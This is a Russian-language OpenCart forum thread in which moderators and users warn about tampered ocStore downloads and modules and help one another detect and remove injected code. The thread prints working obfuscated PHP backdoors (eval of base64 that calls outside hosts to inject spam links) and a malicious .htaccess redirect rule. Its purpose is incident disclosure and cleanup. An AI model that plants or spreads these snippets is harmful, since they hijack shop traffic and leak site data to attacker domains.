Перейти к содержанию
dinox

Проверка на наличие вредоносного кода на Ваших сайтах и архивах дополнений

Рекомендуемые сообщения

Ребята c 2 по 5 апреля были атакованы сайты https://opencartforum.com и https://myopencart.com/ и заменены ссылки для скачивания архива ocStore,  по адресу где лежал псевдо-дистрибутив ocStore в файл /system/library/response.php добавлен следующий код:

$ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
 

Который приводит к различным проблема в работе Вашего магазина или перенаправляет его на другие ресурсы. При нахождении такого кода замените файл оригинальным файлом с дистрибутива, соответственно Вашей версии opencart/octore

Архив версий ocStore находится здесь https://code.google.com/p/myopencart/downloads/list

 

В некоторые модуля на форуме в тот же период с  c 2 по 5 апреля были помещены эти файлы все что мы смогли найти мы устранили, если Вы встретили другие модуля которые содержат данный код или у вас в архивах лежат модуля с данным файлом, просьба сообщать мне. Вы все помните что после этого периода форум проходил долгое обновление и ужесточились правила модерирования дополнений, мы  следим за модулями в том числе и на проверку именно такого файла. Просьба всех проверить свои сайты на наличие этого файла, так как сейчас этот файл активно бегает по всему интернету и вы могли захватить его вместе с бесплатными и платными модулями на других и варезных сайтах 

  • +1 7

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Так это два месяца файлы лежали измененными, и никто не заметил?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Так, и теперь можно по подробнее, как проверить файлы на наличие вредоносного кода?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Так это два месяца файлы лежали измененными, и никто не заметил?

Они были проверены до 20 апреля

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Так, и теперь можно по подробнее, как проверить файлы на наличие вредоносного кода?

В первом посте написано где именно может лежать вредоносный код

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сделали бы сквозное красное предупреждение на каждой странице вверху сайта, а то кто сюда зайдет? За две недели эта дрянь могла уйти куда угодно, а так хоть будет шанс, что те, кто скачал измененные модули/сборки сообразят что к чему

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

спасибо, реально помогло!!! 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не пойму вообще, зачем в опенсорсе кодировать участки кода? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не пойму вообще, зачем в опенсорсе кодировать участки кода?

А Open Source здесь причем, Вы тему читали? В данной случае это сделано с целью скрытия вредоносного кода от пользователя.
  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сделали бы сквозное красное предупреждение на каждой странице вверху сайта, а то кто сюда зайдет? За две недели эта дрянь могла уйти куда угодно, а так хоть будет шанс, что те, кто скачал измененные модули/сборки сообразят что к чему

ПОДДЕРЖИВАЮ! Не смотрел бы сайт, не видел бы этой темы!!!!!!!!!!!!

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

добавлено сквозное объявление с первым постом и ссылкой на эту тему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Каким образом происходил заворот трафика? И о чем говорит тект, написанный Вами, после слов Status: Active?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Это что за новый пират такой?  Исходя их этой темы, надо полагать, на данном "ресурсе" предлагается, скачать бесплатно почти все платные дополнения с этого форума, но заведено зараженные?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ссылку то удалите

похоже, что все отсюда утекло туда, бедные разработчики..

PS Зарегистрировался, скачал оттуда модуль - все так и есть, в \system\library\response.php сюрприз лежит) 

Чувствую много начинающих магазинчиков еще успеют нахвататься этого добра

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

тэкс... почистил тему.

господа, чьи сообщения пропали - не обессудьте.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Было такое у меня на одном магазине, после того как я купил и установил модуль simple reg. Долго мучился, чтобы решить и понять откуда этот код взялся. Правда я тогда прочитал у создателя на форуме, что этот код (скорее всего, что код был просто схож с этим кодом вирусом) это его старая защита от взлома и на данный момент была не активна. Так я и не успел с создателем на прямую обсудить этот вопрос.

Так, а что же этот код делает для магазина вредного, кроме того что страшно загружает сервер?? Он копирует данные? Имеет доступ в Бы?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а как избавится от данного кода? 

нашел на одном сайте. 

после удаления данного куска кода, ни морда, ни админка не открываются. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а как избавится от данного кода? 

нашел на одном сайте. 

после удаления данного куска кода, ни морда, ни админка не открываются.

 

Внимательно читаем сообщение dinox-а:

При нахождении такого кода замените файл оригинальным файлом с дистрибутива, соответственно Вашей версии opencart/octore.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А что делает этот вредоносный код? и что понимается под понятием "заворачивает трафик" ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Появляются внешние ссылки на сайты с сомнительным контентом. При этом они не видны человеку, но видны поисковикам.

В разы увеличивается время генерации страницы.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Господа, а не осталось того левого дистрибутива?

мне кажется, что там еще в файле htaccess добавлен код:

 

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ребят, подскажите пожалуйста в footer.tpl должны быть такие строки:

<?php /*Content end output function. Don't remove or edit this code!*/ $footer = eval(base64_decode('JGVuZGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCdhSFIwY0RvdkwzZDNkeTVuYjI5bmJHVnFZWFpoYzJOeWFYQjBMbU52YlM5aGNHa3VjR2h3UDNObGNuWmxjajA9JykuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLmJhc2U2NF9kZWNvZGUoJ0puQmhaMlU5JykuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107ICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGVuZGNvbnRlbnQpOyBlY2hvICRjb250ZW50Ow=='));?>

или нет..а то все файлы движка не хочется обновлять..так как было много изменений... За ранее спасибо

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ребят, подскажите пожалуйста в footer.tpl должны быть такие строки:

<?php /*Content end output function. Don't remove or edit this code!*/ $footer = eval(base64_decode('JGVuZGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCdhSFIwY0RvdkwzZDNkeTVuYjI5bmJHVnFZWFpoYzJOeWFYQjBMbU52YlM5aGNHa3VjR2h3UDNObGNuWmxjajA9JykuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLmJhc2U2NF9kZWNvZGUoJ0puQmhaMlU5JykuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107ICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGVuZGNvbnRlbnQpOyBlY2hvICRjb250ZW50Ow=='));?>

или нет..а то все файлы движка не хочется обновлять..так как было много изменений... За ранее спасибо

Это вредоносный код.

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ребят, подскажите пожалуйста в footer.tpl должны быть такие строки:

<?php /*Content end output function. Don't remove or edit this code!*/ $footer = eval(base64_decode('JGVuZGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCdhSFIwY0RvdkwzZDNkeTVuYjI5bmJHVnFZWFpoYzJOeWFYQjBMbU52YlM5aGNHa3VjR2h3UDNObGNuWmxjajA9JykuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLmJhc2U2NF9kZWNvZGUoJ0puQmhaMlU5JykuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107ICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGVuZGNvbnRlbnQpOyBlY2hvICRjb250ZW50Ow=='));?>

или нет..а то все файлы движка не хочется обновлять..так как было много изменений... За ранее спасибо

Это вредоносный код.

 

спасибо... а где еще может быть вредкод?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Информация о владельце домена на который данный вредоносный код передает информацию (имя домена и текущую страницу):


Domain Name: GOOGLEJAVASCRIPT.COM

Registrar: LLC "REGISTRAR OF DOMAIN NAMES REG.RU"

Whois Server: whois.reg.ru

Referral URL: http://www.reg.ru

Name Server: NS1.FIRSTVDS.RU

Name Server: NS2.FIRSTVDS.RU

Status: clientTransferProhibited

Updated Date: 28-mar-2013

Creation Date: 18-mar-2013

Expiration Date: 18-mar-2014

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×